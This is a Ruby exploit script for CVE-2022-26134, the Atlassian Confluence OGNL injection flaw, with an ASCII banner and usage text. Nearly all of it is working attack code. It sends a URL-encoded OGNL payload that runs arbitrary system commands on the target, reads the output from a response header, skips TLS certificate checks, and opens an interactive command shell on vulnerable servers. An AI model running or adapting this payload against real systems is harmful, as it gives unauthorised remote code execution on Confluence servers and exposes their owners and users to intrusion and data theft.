#!/usr/bin/ruby # # CVE-2022-26134 | Atlassian Confluence RCE Exploit in Ruby # Coded By Habib | Twitter @hab1b0x | LinkedIn @habib0x # Date | 1/06/2022 - 12:00 PM # Website | https://www.habib0x.com require 'net/http' require 'openssl' require 'uri' require 'addressable/uri' require 'readline' def title puts """ # c c wWw wWw -2022-26134 # (OO) (O) (O) wWw # ,'.--.) ( \ / ) (O)_ # / //_|_\ \ \ / / .' __) # | \___ / \/ \ ( _) # '. ) \ `--' / `.__) # `-.' `-..-' # Author:Habib # ruby CVE-2022-26134.rb target_url # ruby CVE-2022-26134.rb http://localhost """ end # If no arguments are given, show title & usage if ARGV.empty? title() exit 0 end # Get Target from stdin target = ARGV[0] command = ARGV[1] # Check if target is valid if not target.start_with?('http') target = 'http://' + target end # Generate full url for launching the attack server url = "#{target}/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22#{command}%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/" uri = URI.parse(Addressable::URI.encode(url)) http = Net::HTTP.new(uri.host, uri.port) # Use SSL/TLS if needed if uri.scheme == 'https' http.use_ssl = true http.verify_mode = OpenSSL::SSL::VERIFY_NONE end # Make the request req = Net::HTTP::Get.new(uri.request_uri) # Check Response res = http.request(req) if res.code == "302" puts "Target is Vulnerable" puts "Getting Shell: #{command}" puts "Type your commands (exit to quit) and press Enter!): " trap('INT', 'SIG_IGN') loop do command = Readline.readline('Habib0x ~> ', true) next if command.empty? exit! if command =~ /exit/ exploit_uri = URI("#{target}/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22#{command}%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/") puts Net::HTTP.get_response(exploit_uri).header['X-Cmd-Response'] end else puts "Exploit Failed" end